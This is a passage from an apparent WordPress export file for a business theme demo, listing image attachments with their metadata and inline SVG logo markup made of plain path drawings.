		<path class="st0" d="M90.4,17.4v-5h-1.8v-1.6h1.8V8.3l2-0.4v2.9h2.5v1.6h-2.5V17c0,0.4,0.1,0.8,0.3,0.9c0.2,0.2,0.5,0.3,1,0.3    c0.2,0,0.4,0,0.6,0c0.2,0,0.4-0.1,0.7-0.2v1.7c-0.3,0.1-0.6,0.1-0.9,0.2c-0.3,0-0.6,0.1-0.9,0.1c-0.9,0-1.6-0.2-2.1-0.6    S90.4,18.3,90.4,17.4z"></path>
		<path class="st0" d="M104.3,18.7c-0.6,0.5-1.1,0.8-1.7,1c-0.6,0.2-1.2,0.3-1.9,0.3c-0.6,0-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.5-1    s-0.7-0.9-1-1.5s-0.4-1.2-0.4-1.8c0-0.7,0.1-1.3,0.3-1.8c0.2-0.6,0.5-1.1,0.9-1.5s0.9-0.7,1.4-1s1.1-0.4,1.7-0.4    c0.6,0,1.2,0.1,1.7,0.4c0.5,0.2,1,0.6,1.3,1s0.7,0.9,0.9,1.5c0.2,0.6,0.3,1.2,0.3,1.9v0.5h-6.7c0.1,0.7,0.4,1.3,0.9,1.8    s1.1,0.7,1.8,0.7c0.4,0,0.8-0.1,1.2-0.2c0.4-0.1,0.7-0.4,0.9-0.6L104.3,18.7z M100.5,12.3c-0.6,0-1.1,0.2-1.5,0.6    c-0.4,0.4-0.7,1-0.8,1.6h4.7c-0.1-0.7-0.4-1.2-0.8-1.6S101.1,12.3,100.5,12.3z"></path>
		<path class="st0" d="M106.9,19.8v-9h2v2c0.2-0.7,0.6-1.2,1-1.6s0.9-0.5,1.5-0.5c0.2,0,0.3,0,0.4,0.1c0.1,0,0.3,0.1,0.4,0.1v1.8    c-0.2-0.1-0.3-0.1-0.5-0.2s-0.4-0.1-0.6-0.1c-0.5,0-0.9,0.1-1.3,0.4c-0.4,0.3-0.7,0.6-0.9,1.1v5.9H106.9z"></path>
		<path class="st0" d="M115,9c-0.3,0-0.6-0.1-0.9-0.4s-0.4-0.5-0.4-0.9c0-0.3,0.1-0.6,0.4-0.9c0.3-0.3,0.5-0.4,0.9-0.4    c0.3,0,0.6,0.1,0.9,0.4c0.3,0.3,0.4,0.5,0.4,0.9c0,0.3-0.1,0.6-0.4,0.9S115.3,9,115,9z M116,10.8v9h-2v-9H116z"></path>
		<path class="st0" d="M118.1,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1c-0.6,0.2-1.2,0.4-1.8,0.4s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C118.2,16.6,118.1,16,118.1,15.3z M122.6,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1    C121.3,18,121.9,18.2,122.6,18.2z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>01</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/01-2/</link>
		<pubDate>Tue, 29 Dec 2020 07:44:29 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/01.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2008</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:44:29]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:44:29]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[01-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/01.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/01.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 132.8 31.6" style="enable-background:new 0 0 132.8 31.6;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x31_">
	<g>
		<path class="st0" d="M36.1,14.4l0,10.1c0,0.5-0.3,0.9-0.7,1.2l-8.7,5c-0.4,0.2-0.9,0.2-1.4,0L19.1,27c0.9-0.3,1.6-1.2,1.6-2.2    v-2.3c0.1,0.1,4.8,2.9,4.8,2.9c0.3,0.2,0.7,0.2,1.1,0l4.4-2.5c0.3-0.2,0.5-0.5,0.5-0.9l0-5.1c0-0.4-0.2-0.7-0.5-0.9l-4.4-2.8    c-0.3-0.2-0.7-0.2-1.1,0l-6.7,3.6c-0.3,0.2-0.7,0.2-1.1,0l-1.8-1h0l0-1.3c0-0.5,0.3-0.9,0.7-1.2l1.6-0.9l5.4-3.1l0.1-0.1l1.6-0.9    c0.4-0.2,0.9-0.2,1.4,0L28.2,9l0.1,0.1l7.1,4.1C35.8,13.4,36.1,13.9,36.1,14.4z"></path>
		<path class="st0" d="M28.3,8.2l-1.5-0.9c-0.4-0.2-0.9-0.2-1.4,0l-1.6,0.9l-0.1,0.1c-1-0.6-4.9-2.9-4.9-2.9c-0.3-0.2-0.7-0.2-1.1,0    l-4.4,2.5c-0.3,0.2-0.5,0.5-0.5,0.9v0.6l0,4.5c0,0.4,0.2,0.7,0.5,0.9l2.7,1.5l1.8,1c0.3,0.2,0.7,0.2,1.1,0l1.7-1l0,4.9    c-0.1,0-1.6,0.9-1.6,0.9c-0.4,0.2-0.9,0.5-1.4,0.3l-1.6-0.8l0,0l-7.1-4.1c-0.4-0.2-0.7-0.7-0.7-1.2l0-1.7l0-5.3l0-3.1    c0-0.5,0.3-0.9,0.7-1.2l8.7-5c0.4-0.2,0.9-0.2,1.4,0l8.7,5c0.4,0.2,0.7,0.7,0.7,1.2C28.3,7.1,28.3,7.5,28.3,8.2z"></path>
		<path class="st0" d="M20.1,22.2l0,2.8v0.3c0,0.5-0.3,0.9-0.7,1.2L18.4,27l-0.5,0.3l-7.1,4.1c-0.4,0.2-0.9,0.2-1.4,0l-8.7-5    C0.3,26.1,0,25.7,0,25.2v-0.3l0-9.8c0-0.5,0.3-0.9,0.7-1.2L7.6,10v5.2c0,0,0,0.1,0,0.1l-2.4,1.4c-0.3,0.2-0.5,0.5-0.5,0.9l0,4.8    v0.3c0,0.4,0.2,0.7,0.5,0.9l4.4,2.6c0.3,0.2,0.7,0.2,1.1,0l4.4-2.5c0.3-0.2,0.5-0.5,0.5-0.9v-0.6l0,0l0.2,0.1l1.4,0.8    c0.4,0.2,0.9,0.2,1.4,0l0,0l0,0c0.1,0,0.1,0,0.2-0.1L20.1,22.2z"></path>
	</g>
	<g>
		<path class="st0" d="M49.8,23.5c-0.9-0.3-1.6-0.6-2.1-1l0.9-2.1c0.5,0.4,1.1,0.7,1.8,0.9c0.7,0.2,1.4,0.3,2.1,0.3    c0.8,0,1.4-0.1,1.7-0.4c0.4-0.2,0.6-0.5,0.6-0.9c0-0.3-0.1-0.5-0.3-0.7c-0.2-0.2-0.5-0.3-0.9-0.5c-0.3-0.1-0.8-0.2-1.4-0.4    c-0.9-0.2-1.7-0.4-2.2-0.6c-0.6-0.2-1.1-0.6-1.5-1c-0.4-0.5-0.6-1.1-0.6-1.9c0-0.7,0.2-1.3,0.6-1.9c0.4-0.6,0.9-1,1.7-1.3    c0.8-0.3,1.7-0.5,2.8-0.5c0.8,0,1.5,0.1,2.2,0.3c0.7,0.2,1.4,0.4,1.9,0.8l-0.9,2.1c-1.1-0.6-2.2-0.9-3.3-0.9    c-0.8,0-1.3,0.1-1.7,0.4c-0.4,0.3-0.6,0.6-0.6,1s0.2,0.7,0.6,0.9c0.4,0.2,1.1,0.4,2,0.6c0.9,0.2,1.7,0.4,2.2,0.6    c0.6,0.2,1.1,0.6,1.5,1c0.4,0.5,0.6,1.1,0.6,1.9c0,0.7-0.2,1.3-0.6,1.9c-0.4,0.6-1,1-1.7,1.3c-0.8,0.3-1.7,0.5-2.8,0.5    C51.6,23.8,50.7,23.7,49.8,23.5z"></path>
		<path class="st0" d="M68.8,21.4v2.2h-9.3v-12h9v2.2h-6.3v2.6h5.6v2.2h-5.6v2.8H68.8z"></path>
		<path class="st0" d="M73.4,23c-1-0.5-1.8-1.3-2.3-2.2c-0.6-0.9-0.8-2-0.8-3.2c0-1.2,0.3-2.2,0.8-3.2c0.6-0.9,1.3-1.7,2.3-2.2    c1-0.5,2.1-0.8,3.4-0.8c1.2,0,2.4,0.3,3.3,0.8c1,0.5,1.8,1.3,2.3,2.2c0.6,0.9,0.9,2,0.9,3.2c0,1.2-0.3,2.2-0.9,3.2    c-0.6,0.9-1.4,1.7-2.3,2.2c-1,0.5-2.1,0.8-3.3,0.8C75.5,23.8,74.4,23.6,73.4,23z M78.7,21c0.6-0.3,1-0.8,1.3-1.4    c0.3-0.6,0.5-1.2,0.5-2c0-0.7-0.2-1.4-0.5-2c-0.3-0.6-0.8-1-1.3-1.4c-0.6-0.3-1.2-0.5-1.9-0.5c-0.7,0-1.3,0.2-1.9,0.5    c-0.6,0.3-1,0.8-1.3,1.4c-0.3,0.6-0.5,1.2-0.5,2c0,0.7,0.2,1.4,0.5,2c0.3,0.6,0.8,1,1.3,1.4c0.6,0.3,1.2,0.5,1.9,0.5    C77.5,21.5,78.1,21.3,78.7,21z"></path>
		<path class="st0" d="M101.1,23.6l0-7.2l-3.5,5.9h-1.2l-3.5-5.8v7h-2.6v-12h2.3l4.5,7.4l4.4-7.4h2.3l0,12H101.1z"></path>
		<path class="st0" d="M106.5,12.7c-0.3-0.3-0.5-0.6-0.5-1.1c0-0.4,0.2-0.8,0.5-1.1c0.3-0.3,0.7-0.4,1.2-0.4c0.5,0,0.9,0.1,1.2,0.4    s0.5,0.6,0.5,1c0,0.4-0.2,0.8-0.5,1.1c-0.3,0.3-0.7,0.4-1.2,0.4C107.2,13.2,106.8,13,106.5,12.7z M106.3,14.4h2.7v9.2h-2.7V14.4z"></path>
		<path class="st0" d="M119.8,15.3c0.7,0.7,1.1,1.7,1.1,3v5.3h-2.7v-4.9c0-0.7-0.2-1.3-0.5-1.6c-0.3-0.4-0.8-0.5-1.4-0.5    c-0.7,0-1.2,0.2-1.6,0.6c-0.4,0.4-0.6,1-0.6,1.9v4.5h-2.7v-9.2h2.5v1.1c0.4-0.4,0.8-0.7,1.3-0.9c0.5-0.2,1.1-0.3,1.7-0.3    C118.2,14.3,119.1,14.7,119.8,15.3z"></path>
		<path class="st0" d="M132.8,11v12.7h-2.5v-1.1c-0.7,0.8-1.6,1.2-2.9,1.2c-0.9,0-1.6-0.2-2.4-0.6c-0.7-0.4-1.3-0.9-1.6-1.7    c-0.4-0.7-0.6-1.5-0.6-2.5c0-0.9,0.2-1.8,0.6-2.5c0.4-0.7,0.9-1.3,1.6-1.7c0.7-0.4,1.5-0.6,2.4-0.6c1.2,0,2.1,0.4,2.8,1.1V11    H132.8z M129.5,20.9c0.4-0.5,0.7-1.1,0.7-1.9c0-0.8-0.2-1.4-0.7-1.9c-0.4-0.5-1-0.7-1.7-0.7c-0.7,0-1.2,0.2-1.7,0.7    c-0.4,0.5-0.7,1.1-0.7,1.9c0,0.8,0.2,1.4,0.7,1.9c0.4,0.5,1,0.7,1.7,0.7C128.5,21.6,129,21.4,129.5,20.9z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>02</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/02-2/</link>
		<pubDate>Tue, 29 Dec 2020 07:44:31 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/02.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2009</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:44:31]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:44:31]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[02-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/02.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/02.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 131.6 29.8" style="enable-background:new 0 0 131.6 29.8;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x32_">
	<g>
		<path class="st0" d="M43.3,8.1h2.8v12.5h-2.8V8.1z"></path>
		<path class="st0" d="M53.1,20.7c-0.7,0-1.4,0-2-0.1s-1.4-0.1-2.1-0.3V8.3c0.6-0.1,1.2-0.2,1.9-0.2c0.7-0.1,1.3-0.1,1.9-0.1    c0.8,0,1.5,0.1,2.2,0.2c0.7,0.1,1.2,0.3,1.7,0.6c0.5,0.3,0.9,0.6,1.1,1.1c0.3,0.5,0.4,1,0.4,1.7c0,1-0.5,1.8-1.4,2.4    c0.8,0.3,1.3,0.7,1.6,1.2c0.3,0.5,0.4,1.1,0.4,1.7c0,1.3-0.5,2.3-1.4,3C56.4,20.4,55,20.7,53.1,20.7z M51.7,13h1.4    c0.9,0,1.5-0.1,1.9-0.3c0.4-0.2,0.6-0.6,0.6-1.1c0-0.5-0.2-0.9-0.6-1.1s-0.9-0.3-1.7-0.3c-0.2,0-0.5,0-0.8,0c-0.3,0-0.5,0-0.7,0    V13z M51.7,15.1v3.2c0.2,0,0.4,0,0.7,0.1c0.2,0,0.5,0,0.8,0c0.8,0,1.5-0.1,2-0.4s0.8-0.7,0.8-1.3c0-0.6-0.2-1-0.6-1.2    c-0.4-0.2-1-0.4-1.9-0.4H51.7z"></path>
		<path class="st0" d="M64.4,8.1c0.2,0.4,0.5,0.9,0.7,1.5c0.3,0.6,0.6,1.2,0.9,1.9c0.3,0.7,0.6,1.4,0.9,2.1s0.6,1.4,0.8,2    c0.3-0.6,0.5-1.3,0.8-2s0.6-1.4,0.9-2.1c0.3-0.7,0.6-1.3,0.9-1.9c0.3-0.6,0.5-1.1,0.7-1.5h2.6c0.1,0.8,0.2,1.8,0.3,2.8    c0.1,1,0.2,2.1,0.3,3.2c0.1,1.1,0.1,2.2,0.2,3.3c0.1,1.1,0.1,2.2,0.2,3.2H72c0-1.2-0.1-2.5-0.1-4c-0.1-1.4-0.2-2.9-0.3-4.3    c-0.2,0.5-0.5,1.1-0.7,1.7c-0.3,0.6-0.5,1.2-0.8,1.8c-0.3,0.6-0.5,1.2-0.7,1.8c-0.2,0.6-0.4,1-0.6,1.4h-2    c-0.2-0.4-0.4-0.9-0.6-1.4c-0.2-0.6-0.5-1.1-0.8-1.8c-0.3-0.6-0.5-1.2-0.8-1.8c-0.3-0.6-0.5-1.2-0.7-1.7c-0.1,1.5-0.2,2.9-0.3,4.3    c-0.1,1.4-0.1,2.7-0.1,4h-2.7c0-1,0.1-2,0.2-3.2c0.1-1.1,0.1-2.2,0.2-3.3c0.1-1.1,0.2-2.2,0.3-3.2c0.1-1,0.2-2,0.3-2.8H64.4z"></path>
		<path class="st0" d="M84.8,8.1c0.2,0.4,0.5,0.9,0.7,1.5c0.3,0.6,0.6,1.2,0.9,1.9c0.3,0.7,0.6,1.4,0.9,2.1s0.6,1.4,0.8,2    c0.3-0.6,0.5-1.3,0.8-2s0.6-1.4,0.9-2.1c0.3-0.7,0.6-1.3,0.9-1.9c0.3-0.6,0.5-1.1,0.7-1.5h2.6c0.1,0.8,0.2,1.8,0.3,2.8    c0.1,1,0.2,2.1,0.3,3.2c0.1,1.1,0.1,2.2,0.2,3.3c0.1,1.1,0.1,2.2,0.2,3.2h-2.7c0-1.2-0.1-2.5-0.1-4c-0.1-1.4-0.2-2.9-0.3-4.3    c-0.2,0.5-0.5,1.1-0.7,1.7c-0.3,0.6-0.5,1.2-0.8,1.8c-0.3,0.6-0.5,1.2-0.7,1.8c-0.2,0.6-0.4,1-0.6,1.4h-2    c-0.2-0.4-0.4-0.9-0.6-1.4c-0.2-0.6-0.5-1.1-0.8-1.8c-0.3-0.6-0.5-1.2-0.8-1.8c-0.3-0.6-0.5-1.2-0.7-1.7c-0.1,1.5-0.2,2.9-0.3,4.3    c-0.1,1.4-0.1,2.7-0.1,4h-2.7c0-1,0.1-2,0.2-3.2c0.1-1.1,0.1-2.2,0.2-3.3c0.1-1.1,0.2-2.2,0.3-3.2c0.1-1,0.2-2,0.3-2.8H84.8z"></path>
		<path class="st0" d="M97,15.9c0-0.8,0.1-1.6,0.4-2.2c0.3-0.6,0.6-1.2,1-1.6c0.4-0.4,0.9-0.7,1.4-1c0.5-0.2,1.1-0.3,1.7-0.3    c1.3,0,2.4,0.4,3.2,1.2c0.8,0.8,1.2,2,1.2,3.6c0,0.2,0,0.3,0,0.5c0,0.2,0,0.4,0,0.5h-6.1c0.1,0.6,0.3,1,0.8,1.3s1.1,0.5,1.8,0.5    c0.5,0,1,0,1.4-0.1c0.5-0.1,0.9-0.2,1.2-0.3l0.4,2.2c-0.1,0.1-0.3,0.1-0.6,0.2c-0.2,0.1-0.5,0.1-0.8,0.2c-0.3,0.1-0.6,0.1-0.9,0.1    s-0.7,0.1-1,0.1c-0.9,0-1.6-0.1-2.2-0.4s-1.2-0.6-1.6-1c-0.4-0.4-0.7-1-0.9-1.6C97.1,17.2,97,16.6,97,15.9z M103.3,14.9    c0-0.2-0.1-0.4-0.1-0.7c-0.1-0.2-0.2-0.4-0.3-0.6c-0.1-0.2-0.3-0.3-0.5-0.4c-0.2-0.1-0.5-0.2-0.8-0.2c-0.3,0-0.6,0.1-0.8,0.2    c-0.2,0.1-0.4,0.2-0.5,0.4c-0.1,0.2-0.3,0.4-0.3,0.6c-0.1,0.2-0.1,0.4-0.2,0.7H103.3z"></path>
		<path class="st0" d="M116.4,20.2c-0.2,0.1-0.5,0.1-0.8,0.2c-0.3,0.1-0.6,0.1-1,0.2c-0.3,0-0.7,0.1-1,0.1c-0.4,0-0.7,0-1,0    c-0.8,0-1.5-0.1-2.1-0.3c-0.6-0.2-1.1-0.6-1.5-1c-0.4-0.4-0.7-0.9-1-1.5c-0.2-0.6-0.3-1.3-0.3-2c0-0.8,0.1-1.5,0.3-2.1    c0.2-0.6,0.5-1.1,0.8-1.6c0.4-0.4,0.8-0.8,1.3-1c0.5-0.2,1.1-0.3,1.8-0.3c0.4,0,0.7,0,1,0.1c0.3,0.1,0.6,0.2,0.9,0.3V7l2.7-0.4    V20.2z M110.3,15.7c0,0.8,0.2,1.5,0.6,2s0.9,0.8,1.7,0.8c0.2,0,0.5,0,0.7,0c0.2,0,0.4,0,0.5-0.1v-4.9c-0.2-0.1-0.4-0.2-0.7-0.3    c-0.3-0.1-0.5-0.1-0.8-0.1C110.9,13.2,110.3,14,110.3,15.7z"></path>
		<path class="st0" d="M121.8,8.3c0,0.5-0.2,0.9-0.5,1.2s-0.7,0.4-1.1,0.4c-0.4,0-0.8-0.1-1.1-0.4s-0.5-0.7-0.5-1.2s0.2-0.9,0.5-1.2    c0.3-0.3,0.7-0.4,1.1-0.4c0.4,0,0.8,0.1,1.1,0.4C121.6,7.5,121.8,7.9,121.8,8.3z M121.6,20.6h-2.7v-9.5h2.7V20.6z"></path>
		<path class="st0" d="M127.5,10.8c0.8,0,1.5,0.1,2,0.3c0.5,0.2,1,0.4,1.3,0.8c0.3,0.3,0.5,0.7,0.7,1.2c0.1,0.5,0.2,1,0.2,1.6v5.6    c-0.4,0.1-0.9,0.2-1.6,0.3c-0.7,0.1-1.5,0.2-2.5,0.2c-0.6,0-1.2-0.1-1.7-0.2c-0.5-0.1-0.9-0.3-1.3-0.5s-0.6-0.6-0.8-1    c-0.2-0.4-0.3-0.9-0.3-1.5c0-0.6,0.1-1,0.3-1.4c0.2-0.4,0.5-0.7,0.9-0.9c0.4-0.2,0.8-0.4,1.3-0.5c0.5-0.1,1-0.2,1.5-0.2    c0.3,0,0.7,0,0.9,0c0.3,0,0.5,0.1,0.7,0.1v-0.3c0-0.5-0.1-0.8-0.4-1.1c-0.3-0.3-0.8-0.4-1.4-0.4c-0.5,0-0.9,0-1.4,0.1    c-0.4,0.1-0.8,0.2-1.2,0.3l-0.3-2.2c0.2,0,0.4-0.1,0.6-0.2c0.2-0.1,0.5-0.1,0.8-0.1c0.3,0,0.6-0.1,0.9-0.1    C126.9,10.8,127.2,10.8,127.5,10.8z M127.7,18.7c0.3,0,0.5,0,0.8,0s0.4,0,0.6-0.1v-2c-0.1,0-0.3,0-0.5-0.1c-0.2,0-0.4,0-0.6,0    c-0.3,0-0.5,0-0.7,0s-0.4,0.1-0.6,0.2s-0.3,0.2-0.4,0.3c-0.1,0.1-0.1,0.3-0.1,0.5c0,0.4,0.1,0.7,0.4,0.9S127.2,18.7,127.7,18.7z"></path>
	</g>
	<g>
		<g>
			<path class="st0" d="M5.5,6.5V0H4.8C2.2,0,0,2.2,0,4.8v1.7H5.5z"></path>
		</g>
		<g>
			<path class="st0" d="M25.1,8.4h4.8V4.8c0-2.6-2.1-4.8-4.8-4.8V8.4z"></path>
		</g>
		<g>
			<path class="st0" d="M21.6,25.1v4.7H25c2.6,0,4.8-2.1,4.8-4.7H21.6z"></path>
		</g>
		<g>
			<path class="st0" d="M6.7,23.8H0v-1.5h7.4c0.4,0,0.8,0.3,0.8,0.8v6.8h2.2v-9.4H6c-0.4,0-0.8-0.3-0.8-0.8V14     c-0.5-0.3-0.9-0.9-0.9-1.5c0-0.9,0.8-1.7,1.7-1.7c0.9,0,1.7,0.8,1.7,1.7c0,0.7-0.4,1.3-1,1.6V19h4.4c0.4,0,0.8,0.3,0.8,0.8v10.1     h3.4v-3.4c-0.6-0.3-1-0.9-1-1.6c0-0.9,0.8-1.7,1.7-1.7s1.7,0.8,1.7,1.7c0,0.7-0.4,1.2-0.9,1.5v3.4H20v-5.5c0-0.4,0.3-0.8,0.8-0.8     h9v-9.5h-3v4.7c0,0.4-0.3,0.8-0.8,0.8h-5.5c-0.3,0.6-0.9,1-1.6,1c-0.9,0-1.7-0.8-1.7-1.7c0-0.9,0.8-1.7,1.7-1.7     c0.7,0,1.2,0.4,1.5,0.9h4.8v-4.7c0-0.4,0.3-0.8,0.8-0.8h3.7V9.9h-5.5c-0.4,0-0.8-0.3-0.8-0.8V0h-8.2v2.7h5.1     c0.4,0,0.8,0.3,0.8,0.8v5.6c0.6,0.3,1,0.9,1,1.6c0,0.9-0.8,1.7-1.7,1.7c-0.9,0-1.7-0.8-1.7-1.7c0-0.7,0.4-1.2,0.9-1.5V4.2h-5.1     c-0.4,0-0.8-0.3-0.8-0.8V0h-3.7v5.6h3.1c0.4,0,0.8,0.3,0.8,0.8v7c0.6,0.3,1,0.9,1,1.6c0,0.9-0.8,1.7-1.7,1.7     c-0.9,0-1.7-0.8-1.7-1.7c0-0.6,0.4-1.2,0.9-1.5V7.1H9.4C9,7.1,8.6,6.7,8.6,6.3V0H7v7.2C7,7.7,6.7,8,6.3,8H0v17     c0,2.7,2.2,4.8,4.8,4.8h1.9V23.8z"></path>
		</g>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>03</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/03-2/</link>
		<pubDate>Tue, 29 Dec 2020 07:44:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/03.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2010</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:44:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:44:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[03-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/03.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/03.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 141.3 30" style="enable-background:new 0 0 141.3 30;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x33_">
	<g>
		<path class="st0" d="M63.8,17.8c0,0.7-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5c-0.4,0.4-0.9,0.8-1.5,1c-0.6,0.2-1.2,0.4-1.9,0.4    c-0.7,0-1.4-0.1-2-0.4c-0.6-0.2-1.1-0.6-1.6-1c-0.4-0.4-0.8-0.9-1.1-1.5c-0.3-0.6-0.4-1.2-0.4-1.9c0-0.7,0.1-1.3,0.4-1.9    c0.3-0.6,0.6-1.1,1-1.5c0.4-0.4,1-0.8,1.6-1c0.6-0.2,1.3-0.4,1.9-0.4c0.8,0,1.5,0.2,2.2,0.5c0.7,0.3,1.3,0.8,1.7,1.3l-1.6,1.4    c-0.3-0.4-0.7-0.7-1-0.9s-0.8-0.3-1.3-0.3c-0.4,0-0.7,0.1-1,0.2c-0.3,0.1-0.6,0.3-0.8,0.6s-0.4,0.5-0.5,0.9    c-0.1,0.3-0.2,0.7-0.2,1.1c0,0.4,0.1,0.8,0.2,1.1c0.1,0.3,0.3,0.6,0.6,0.9s0.5,0.4,0.8,0.6c0.3,0.1,0.7,0.2,1.1,0.2    c0.5,0,1-0.1,1.4-0.4c0.4-0.3,0.7-0.6,0.8-1.1h-2.5v-2h5V17.8z"></path>
		<path class="st0" d="M65,22.5v-9.3h4.8c0.5,0,0.9,0.1,1.3,0.2c0.4,0.1,0.7,0.4,1,0.6c0.3,0.3,0.5,0.6,0.7,0.9    c0.2,0.4,0.2,0.8,0.2,1.2c0,0.6-0.2,1.1-0.5,1.6c-0.3,0.5-0.7,0.8-1.3,1.1l2,3.7h-2.6L69,19.1h-1.7v3.4H65z M69.6,15.1h-2.3v2.1    h2.3c0.4,0,0.6-0.1,0.9-0.3c0.2-0.2,0.3-0.4,0.3-0.8c0-0.3-0.1-0.6-0.3-0.8C70.2,15.2,69.9,15.1,69.6,15.1z"></path>
		<path class="st0" d="M74.2,22.5v-9.3h7.3v2h-5.1v1.7h3.3v1.9h-3.3v1.8h5.1v2H74.2z"></path>
		<path class="st0" d="M83,22.5v-9.3h7.3v2h-5.1v1.7h3.3v1.9h-3.3v1.8h5.1v2H83z"></path>
		<path class="st0" d="M91.7,13.2h2.2l4.2,5.4v-5.4h2.2v9.3h-2l-4.4-5.6v5.6h-2.2V13.2z"></path>
